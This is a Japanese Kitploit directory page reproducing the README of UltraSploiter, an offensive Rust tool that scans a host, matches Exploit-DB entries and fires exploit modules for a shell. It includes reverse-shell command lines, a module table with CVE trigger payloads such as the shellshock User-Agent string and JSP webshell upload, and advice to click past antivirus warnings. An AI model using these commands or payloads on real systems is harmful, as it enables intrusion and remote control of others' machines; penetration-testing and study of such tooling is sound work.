Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ultrasploiter — ポートスキャナ、Exploit-DBの全インデックス(47kエントリ)、実行可能なエクスプロイトモジュールを1つのツールに統合した単一バイナリ。Rustで書かれており、Linux、Windows、macOSで動作します。 | Kitploit
ツール/GitLabGitLab/vqkro/ultrasploiter
ペネトレーションテストフレームワーク偵察脆弱性スキャナーエクスプロイトフレームワークネットワークマッピングポートスキャンエクスプロイトウェブアプリケーション悪用情報収集コマンド&コントロールレッドチーミングペイロード開発
1013時間14分前未レビュー
GitLabvqkro/ultrasploiter

ultrasploiter

ポートスキャナ、Exploit-DBの全インデックス(47kエントリ)、実行可能なエクスプロイトモジュールを1つのツールに統合した単一バイナリ。Rustで書かれており、Linux、Windows、macOSで動作します。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

UltraSploiter

スキャン、マッチ、エクスプロイト — IPを1つ入力すれば、シェルが返ってくる。

ポートスキャナ、Exploit-DBの全インデックス、そして実行可能なエクスプロイトモジュール群を1つのツールにまとめた単一バイナリ。Linux、Windows、macOSで動作します。

作業通常ここでは
ホスト上のサービスを探すnmapUltraSploiter scan <ip>
エクスプロイトを検索するsearchsploitUltraSploiter search <kw>
それらを発射するmsfconsoleUltraSploiter exploit <ip> <module>

UltraSploiter メニュー


インストール

最も簡単で最良の方法は、ビルド済みバイナリを入手して実行するだけです。 インストール不要、依存関係なし — 自己完結した1つのファイルです。

Releasesページからダウンロード:

  • Windows — UltraSploiter-windows-x86_64.exe → ダブルクリック
  • Linux — UltraSploiter-linux-x86_64
  • macOS — ビルド済みバイナリはまだありません。1コマンドでビルドできます(下記)

注意: セキュリティツールはフラグが立てられます。Windows SmartScreenやアンチウイルスがバイナリに警告を出したり隔離したりする可能性が高いです — 詳細情報 → 実行 をクリックするか、常駐させる場合は除外設定に追加してください。

Windows

UltraSploiter.exeをダブルクリックします。メニューが開きます。

SmartScreenが不明な発行元について警告を出す場合(署名のないバイナリでは必ず出ます)、詳細情報 → 実行 をクリックしてください。

Linux

chmod +x UltraSploiter-linux-x86_64
./UltraSploiter-linux-x86_64

macOS

chmod +x UltraSploiter-macos-arm64
./UltraSploiter-macos-arm64

Gatekeeperがブロックする場合(これも署名のないバイナリでは必ずです)、右クリック → 開く を選ぶか、隔離フラグを一度クリアしてください:

xattr -d com.apple.quarantine UltraSploiter-macos-arm64

ソースからビルド

お使いのプラットフォーム用のバイナリがない場合、または変更を加えたい場合にのみ必要です。 Rust 1.74以上が必要です。

Linux

sudo apt install build-essential    # gcc + linker (Debian/Ubuntu)
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

macOS

xcode-select --install              # clang + linker
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

Windows

git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
.\build.ps1                         # -> UltraSploiter.exe

build.ps1はstable-x86_64-pc-windows-gnuツールチェーンを使用し、MinGWでリンクします — つまりVisual StudioやMSVCは不要です。ツールチェーンがなければインストールします。すでにMSVC Build Toolsがある場合は、単純なcargo build --releaseでも動作します。

Windows + GNUに関する注意: windows-sys(tokioによって取り込まれる)はdlltoolを呼び出し、それがアセンブラasを呼び出します — そしてrust-mingwコンポーネントにはasが同梱されていません。build.ps1は%~dp0tools\mingw64\binと%USERPROFILE%\tools\mingw64\binの中にasを持つMinGWのbinを探し、見つかればPATHの先頭に追加します。error calling dlltoolに遭遇した場合は、そこにwinlibsのビルドを配置してください。MSVCツールチェーンは影響を受けません。


実行する

引数なしで実行するとメニューが表示されます:

   1)  Scan a target           find open ports and services
   2)  Search exploits         keyword lookup
   3)  List runnable modules
   4)  Run an exploit          pick a target and a module
   5)  Console                 advanced msf-style commands
   0)  Exit

コマンドライン

UltraSploiter scan 10.0.0.5                      # top 1000 ports + fingerprint + suggestions
UltraSploiter scan 10.0.0.5 -p 1-1024 -T4        # range, fast timing
UltraSploiter scan 10.0.0.5 -p -                 # all 65535 ports
UltraSploiter scan 10.0.0.5 -sU                  # UDP scan
UltraSploiter scan 10.0.0.5 --json
UltraSploiter scan 10.0.0.5 -oX out.xml
UltraSploiter search samba
UltraSploiter info 17491
UltraSploiter show 17491                          # print the PoC source for an Exploit-DB id
UltraSploiter modules
UltraSploiter msf search smb                      # bridge to Metasploit (needs it installed)
UltraSploiter exploit 10.0.0.5 vsftpd_234
UltraSploiter exploit 10.0.0.5 shellshock -o lhost=10.0.0.1 -o lport=4444
UltraSploiter console

Linux/macOSでは./を付けてください(例: ./UltraSploiter scan 10.0.0.5)。

スキャンフラグ

フラグ意味
-p <spec>top (1000)、80,443、1-1024、- (すべて)
-T0..-T5タイミングテンプレート — 遅い/静かから速い/騒がしいまで
-sUUDPプローブスキャン
-sVサービス/バージョン検出(デフォルトで有効)
--no-bannerバナー取得をスキップ
--jsonstdoutにJSON
-oX <file>nmap形式のXML

スキャナは非同期(tokio)です: 各-Tレベルは同時に処理するソケット数を設定し(-T5では最大8000)、nmapのtop-1000を数秒でカバーします。すべての「open」は完了したTCPハンドシェイクであるため、結果は正確です。

オプション (-o key=value)

キー使用元意味
lhost, lportリバースシェルモジュールコールバックアドレス
rportWebモジュールHTTPポートを上書き
pathshellshock, struts, phpunitエンドポイントパス
user, passtomcat_managerマネージャ認証情報
coresolr_rceSolrコア名
filegrafana_lfi読み取るファイル
ssh_pubkeyredis_unauthauthorized_keysに書き込む鍵
src, dstproftpd_modcopyコピー元 / コピー先
timeoutすべてソケットタイムアウト秒

エクスプロイトデータベース

searchとinfoは完全なExploit-DBインデックス — 47,000件以上 (searchsploitが使用するのと同じデータセット)に支えられており、バイナリにバンドルされています。エントリが実行可能なモジュールが実装するCVEを持つ場合、infoは両者をリンクします:

$ UltraSploiter info 17491
Exploit-DB 17491
  description  vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
  codes        OSVDB-73573;CVE-2011-2523

  [runnable] vsftpd_234
  UltraSploiter exploit <ip> vsftpd_234

実行可能なモジュール (37)

モジュールCVEトリガー
vsftpd_234CVE-2011-2523:)ユーザー名 → 6200でrootバインドシェル
unrealircd_backdoorCVE-2010-2075IRC経由のAB; <cmd>
distcc_execCVE-2004-2687DISTプロトコルコンパイラ引数
proftpd_modcopyCVE-2015-3306SITE CPFR/CPTOファイルコピー
redis_unauth—CONFIG SETが鍵またはcronエントリを書き込む
shellshockCVE-2014-6271User-Agent: () { :; }; <cmd>
struts2_5638CVE-2017-5638Content-Type内のOGNL
tomcat_putCVE-2017-12615JSPウェブシェルをPUT
tomcat_manager—/manager経由でWARをデプロイ
elasticsearch_groovyCVE-2015-1427_search内のGroovy RCE
drupalgeddon2CVE-2018-7600Form APIレンダーコールバック
phpunit_evalCVE-2017-9841eval-stdin.php
jenkins_scriptCVE-2019-1003000認証不要の/script Groovy
solr_rceCVE-2019-17558stream.body内のVelocityテンプレート
grafana_lfiCVE-2021-43798プラグインパストラバーサルによるファイル読み取り
webmin_backdoorCVE-2019-15107password_change.cgiが値をシェルにパイプ
php_cgi_arg_injectionCVE-2012-1823クエリ文字列経由の-d auto_prepend_file

それぞれが非破壊的なcheck()とrun()を実装しています。

カタログモジュール (データ駆動型)

これらはdata/catalog.json内のカタログエンジンによって実行される小さなJSONレシピです。 モジュールの追加は新しいソースファイルではなく、約8行のデータです:

idCVE内容
CAT-F5-TMUI-LFICVE-2020-5902F5 BIG-IP TMUIファイル読み取り
CAT-F5-ICONTROL-BASHCVE-2021-22986F5 iControl REST認証不要RCE
CAT-F5-ICONTROL-2022-1388CVE-2022-1388F5 iControl認証バイパスRCE
CAT-PULSE-SECURE-LFICVE-2019-11510Pulse Secure VPNファイル読み取り
CAT-CITRIX-2019-19781CVE-2019-19781Citrix ADCファイル読み取り
CAT-APACHE-2449 / -RCECVE-2021-41773Apache 2.4.49トラバーサル / mod_cgi RCE
CAT-APACHE-2450 / -RCECVE-2021-42013Apache 2.4.50トラバーサル / mod_cgi RCE
CAT-VBULLETIN-2019-16759CVE-2019-16759vBulletin widget_php RCE
CAT-VBULLETIN-2020-17496CVE-2020-17496vBulletinネストウィジェットRCE
CAT-NEXUS3-LFICVE-2024-4956Nexus Repository 3パストラバーサル
CAT-FORTINET-FGTLANGCVE-2018-13379Fortinet SSL-VPNセッションファイル読み取り
CAT-PHPMYADMIN-LFICVE-2018-12613phpMyAdminローカルファイルインクルージョン
CAT-MINIO-INFOCVE-2023-28432MinIO環境 / 認証情報の漏洩
CAT-SPRING-ACTUATOR-ENV—Spring Bootアクチュエータ設定漏洩
CAT-DOCKER-API—オープンなDocker Engine API
CAT-KUBELET-PODS—匿名kubeletポッド一覧
CAT-ETCD-KEYS—認証不要のetcdキーストア
CAT-HADOOP-WEBHDFS—認証不要のWebHDFS一覧

エンジンはメソッド、ヘッダー、ボディ、{cmd} / {file} / {lhost} / {lport}の置換、パスを考慮したURLエンコーディング(トラバーサルではスラッシュはリテラルのまま、フォームボディは完全にエンコード、JSONは生のまま)、成功マーカー、リバースシェルハンドラ、そしてcurl経由のHTTPSを処理するため、ポート443のレシピはバイナリにTLS依存関係なしで動作します。

Metasploitブリッジ

すでにMetasploitがインストールされている場合、msfはそれにパススルーします:

ツールをダウンロード